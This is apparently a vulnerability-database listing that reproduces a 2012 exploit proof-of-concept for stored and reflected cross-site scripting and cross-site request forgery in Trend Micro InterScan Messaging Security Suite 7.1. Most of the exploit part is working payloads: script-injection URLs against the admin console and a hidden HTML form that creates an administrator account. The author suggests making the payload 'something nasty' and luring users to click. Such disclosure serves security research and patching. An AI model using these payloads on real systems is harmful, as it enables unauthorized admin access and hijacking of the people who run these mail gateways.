Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery

🗓️ 14 Sep 2012 00:00:00Reported by modpr0beType

Trend Micro Interscan Messaging Security Suite Stored XSS and CSRF vulnerabilities, affecting version 7.1-Build_Win32_139

Reporter	Title	Published	Views	Family All 14
0day.today	Trend Micro InterScan Messaging Security Suite XSS / CSRF Vulnerabilities	15 Sep 201200:00	–	zdt
Check Point Advisories	Trend Micro InterScan Messaging Security Suite Cross-site Scripting (CVE-2012-2995)	16 Dec 201200:00	–	checkpoint_advisories
CVE	CVE-2012-2995	17 Sep 201214:00	–	cve
CVE	CVE-2012-2996	17 Sep 201214:00	–	cve
Cvelist	CVE-2012-2995	17 Sep 201214:00	–	cvelist
Cvelist	CVE-2012-2996	17 Sep 201214:00	–	cvelist
EUVD	EUVD-2012-2974	7 Oct 202500:30	–	euvd
exploitpack	Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting Cross-Site Request Forgery	14 Sep 201200:00	–	exploitpack
NVD	CVE-2012-2995	17 Sep 201214:55	–	nvd
NVD	CVE-2012-2996	17 Sep 201214:55	–	nvd

# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996

# Software Description
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
# mail gateway security. Choose state-of-the-art software or a hybrid solution 
# with on-premise virtual appliance and optional cloud pre-filter that blocks 
# the vast majority of spam and malware outside your network. Plus our Data 
# Privacy and Encryption Module secure outbound data to ensure privacy and 
# regulatory compliance.

# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) 
# and cross-site request forgery (CWE-352) vulnerabilities.

# Proof of Concept
# Persistent/Stored XSS
# this POC will store defined URL to white list URL page. Each time we access to this page, the XSS word
# will pop up to the user. You can change the alert message box to something nasty (e.g redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

# Non-persistent/Reflected XSS
# This is non-persistent XSS, you might lure target user to click this link :)
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

# Cross-Site Request Forgery
# This POC should be targeted to user with admin privilege
# It will add admin user with user quorra, and password quorra.123
# Target victim must be authenticated when perform this POC
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

14 Sep 2012 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 26.8

EPSS0.30352